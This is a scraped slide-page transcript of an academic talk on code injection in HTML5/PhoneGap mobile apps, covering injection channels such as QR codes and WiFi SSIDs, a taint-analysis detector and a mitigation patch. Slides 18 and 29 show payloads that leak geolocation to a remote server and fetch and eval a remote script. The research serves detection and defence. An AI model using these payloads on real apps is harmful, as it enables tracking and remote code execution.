Presentation is loading. Please wait.

Presentation is loading. Please wait.

Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,

Published byKayden Denman Modified over 9 years ago

Similar presentations

Presentation on theme: "Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,"— Presentation transcript:

1 Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation
Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin, Gautam Nagesh Peri Department of Electrical Engineering & Computer Science Syracuse University

2 (a) (b) (c) (d) (e) (f) (g) (h)

3 News Covered

4 Outline HTML5-based Mobile App and Risk
Code Injection Attacks on HTML5-based mobile apps Detection of Code Injection Attacks on HTML5-based mobile apps Mitigation of Code Injection Attacks on HTML5-based mobile apps Here is the outline of my presentation. First, I will give a overview of HTML5-based Mobile App and PhoneGap Architecture. PhoneGap is a popular middleware framework that can be used to develop HTML5-based mobile apps. We will also talk about the risks in JavaScript, which is the fundamental cause of the attack we have identified. Then I will talk about the attack by listing the channels and showing some examples. I will also show one of the real vulnerable app that we found in the android market. At last , I will list our future work

5 HTML5-based Mobile App and Risk

6 Cross Platform Application Development
Windows Phone How Can I develop applications for all the platforms?

7 Overview of HTML5-based Mobile App
Advantage: Can be easily ported between different platforms PhoneGap WebView HTML CSS JavaScript addJavascriptInterface() Device Accelerometer Camera Compass Contacts File Geolocation Notification Disadvantage: Need to build the bridge between JavaScript and native resources

8 Overview of PhoneGap Architecture

9 Risks in HTML5-based Mobile App (JavaScript)
Data and code can be mixed together. var text="Hello!<script>alert('hello')</script>"; document.write(text); Once it runs, the data will be displayed, and the JavaScript code will also be executed.

10 Code Injection Attacks on HTML5-based Mobile App

11 Cross-Site Scripting Attack (XSS)

12 Much broader attack surface
Overview of our Attack Much broader attack surface

13 Condition1: Attack Channels
NFC SMS MP3

14 Condition2: Display APIs(Triggering Code)
In our sample set (15,510 apps), 93% of apps use at least one unsafe APIs/attributes at least one time

15 Vulnerable Code Example
document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { window.plugins.barcodeScanner.scan(0, onSuccess, onError); } function onSuccess(result) { $("#display").html(result.text); function onError(contactError) { alert('onError!'); function unrealted() { alert(‘Unrelated functio’); Condition 1 (channel: barcode) Condition 2 (Vulnerable API:html)

16 Achieving Damage Directly Attack System Resources
2 Directly Attack System Resources Propagate to other Apps Propagate to other Devices 3 1

17 Real Vulnerable App Example
Malicious QR code Vulnerable App (Android, iOS, Windows Phone) Being Traced

18 Real Vulnerable App Example
The malicious code injected in the QR code <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m=’Latitude:’+loc.coords.latitude+ ’\n’+’Longitude:’+loc.coords.longitude; alert(m); b=document.createElement(’img’); b.src=’ })> Use HTML5 Geolocation API to get Location Alert location information for demonstration purpose Real damage, send location information to remote server

19 Detection of Code Injection Attacks on HTML5-based Mobile App

20 Derive Data Flow Problem
Data Retrieved Using PhoneGap API Source Vulnerable Display APIs Sink

21 Challenges C1: Mixture of application and framework code
<html> <head> <script src= </head> <body> <script> document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { window.plugins.barcodeScanner.scan(0,onSuccess, onError); } …… </script> </body> </html> C3 C1: Mixture of application and framework code C2: Difficulties in static analysis on JavaScript C3: Dynamic loaded content C2 C1

22 Framework Modeling Goal: connect data flow within PhoneGap Framework
window = { plugins: { barcodeScanner:{ scan: function scan (mode,suc,err) { exec(suc, err, “scan”,[mode]); }}}} exec:function exec(suc,err,plugin,op,arg){ var dat = “fake”; suc(dat); err(dat); } Windows.plugins.barcodeScanner.scan(0, onSuccess, onError); Data Flow PhoneGap Framework Model Data Flow

23 Static Taint Analysis on Slice
Goal: Accurate detect taint slice by backward slice from vulnerable APIs document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { window.plugins.barcodeScanner.scan(0,onSuccess, onError); } function onSuccess(result) { $("#display").html(result.text); function onError(contactError) { alert('onError!'); window.plugins.barcodeScanner.scan (Source) OnSuccess() .html() (Sink)

24 Evaluation Performance Accuracy
15,510 apps from the official Google Play Market Hardware spec: Intel Core i GHz with 16GB RAM. Performance Accuracy Average processing time : 15.38 sec/app 478/15,510 flagged as vulnerable False positive rate: 2.30% (because of dead code)

25 Case Study (The most powerful ones)
Selected 20 apps (most powerful ones)

26 Other Static Analysis in Android
Privilege escalation (Permission) Component Hijacking (Intent) SSL/TLS Stowaway Chex SMV-HUNTER Pscout Woodpecker ContentScope MalloDroid ComDroid AppSealer CryptoLint

27 Mitigation of Code Injection Attacks on HTML5-based Mobile App

28 Mitigation PhoneGap App PhoneGap Framework (Java) Plugins (Java)
Camera Contact SMS Bridge Plugin Manager Filter (jsoup) JSMessage Queue WebView HTML5 CSS JavaScript addJavascript -interface R e s o u r c

29 WiFi Demo (SSID Length Limitation)
<img src onerror=$.getScript(' (need to usejQuery) 32 SSID <img src onerror=a="$.getScr“> <img src onerror=b="ipt('ht”> Each SSID < 32 <img src onerror=c="tp://mu."> <img src onerror=d="gl')“> <img src onerror=eval(a+b+c+d)>

30 Demo (Video)

31 Conclusion Presented a systematic study of Code Injection Attacks on HTML5-based mobile Apps Designed and implemented a tool to automatic detect the vulnerabilities in HTML5-based mobile App Implemented a prototype (NoInjection) as a patch to the PhoneGap framework in Android to mitigate the attack

32 Thanks! Q & A Would you scan this?

Download ppt "Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,"

Similar presentations

Code Injection Attacks on HTML5-based Mobile Apps

Code Injection Attacks on HTML5-based Mobile Apps
Mobile Application Development Keshav Bahadoor. Part 1 Cross Platform Web Applications.

Mobile Application Development Keshav Bahadoor. Part 1 Cross Platform Web Applications.
Xiao Zhang and Wenliang Du Dept. of Electrical Engineering & Computer Science Syracuse University.

Xiao Zhang and Wenliang Du Dept. of Electrical Engineering & Computer Science Syracuse University.
D4.3 Additional Applications iPad Application – Facebook Integration George Chrysochoidis i-sieve technologies ltd. PATHS Project Review, 12th March 2014,

D4.3 Additional Applications iPad Application – Facebook Integration George Chrysochoidis i-sieve technologies ltd. PATHS Project Review, 12th March 2014,
Cross Platform Mobile application development HTML5 and JavaScript Chris Connor.

Cross Platform Mobile application development HTML5 and JavaScript Chris Connor.
Mobile Application Development

Mobile Application Development
Development of mobile applications using PhoneGap and HTML 5

Development of mobile applications using PhoneGap and HTML 5
DYNAMIC DATA TAINTING AND ANALYSIS. Roadmap  Background  TaintDroid  JavaScript  Conclusion.

DYNAMIC DATA TAINTING AND ANALYSIS. Roadmap  Background  TaintDroid  JavaScript  Conclusion.
Introduction to Android Platform Overview 19.3.2013.

Introduction to Android Platform Overview
Native vs hybrid vs web mobile Application

Native vs hybrid vs web mobile Application
The PhoneGap History Doncho Minkov Telerik Academy academy.telerik.com Technical Trainer

The PhoneGap History Doncho Minkov Telerik Academy academy.telerik.com Technical Trainer
Intelligent Tutoring System Mobile Communication Team Drew Boatwright Nakul Dureja Richard Liou.

Intelligent Tutoring System Mobile Communication Team Drew Boatwright Nakul Dureja Richard Liou.
Common Alerting Protocol (CAP) Implementation Workshop – 2014 ArcGIS Geotrigger for CAP Implementation by Nalaka Kodippili Geo Technical Manager GIS Solutions.

Common Alerting Protocol (CAP) Implementation Workshop – 2014 ArcGIS Geotrigger for CAP Implementation by Nalaka Kodippili Geo Technical Manager GIS Solutions.
Lightning Talk Fred Rodriguez Nguyen Do CPSC 473 May 6, 2012.

Lightning Talk Fred Rodriguez Nguyen Do CPSC 473 May 6, 2012.
Three-tier Mobile Application Testing Framework:

Three-tier Mobile Application Testing Framework:
Authors: William Enck The Pennsylvania State University Peter Gilbert Duke University Byung-Gon Chun Intel Labs Landon P. Cox Duke University Jaeyeon Jung.

Authors: William Enck The Pennsylvania State University Peter Gilbert Duke University Byung-Gon Chun Intel Labs Landon P. Cox Duke University Jaeyeon Jung.
Mobile App Support Jacob Poirier Geri Hengesbach Andrea Menke Erin Rossell.

Mobile App Support Jacob Poirier Geri Hengesbach Andrea Menke Erin Rossell.
Android Programming By Mohsen Biglari Android Programming, Part1: Introduction 1 Part1: Introduction By Mohsen Biglari.

Android Programming By Mohsen Biglari Android Programming, Part1: Introduction 1 Part1: Introduction By Mohsen Biglari.
Introduction CIS 136 Building Mobile Apps 1. What is a mobile app? 2  Computer program  Designed for small devices  Smartphones  Tablets  Other handhelds.

Introduction CIS 136 Building Mobile Apps 1. What is a mobile app? 2  Computer program  Designed for small devices  Smartphones  Tablets  Other handhelds.
Take a leap towards the most promising technology

Take a leap towards the most promising technology

Similar presentations

Ads by Google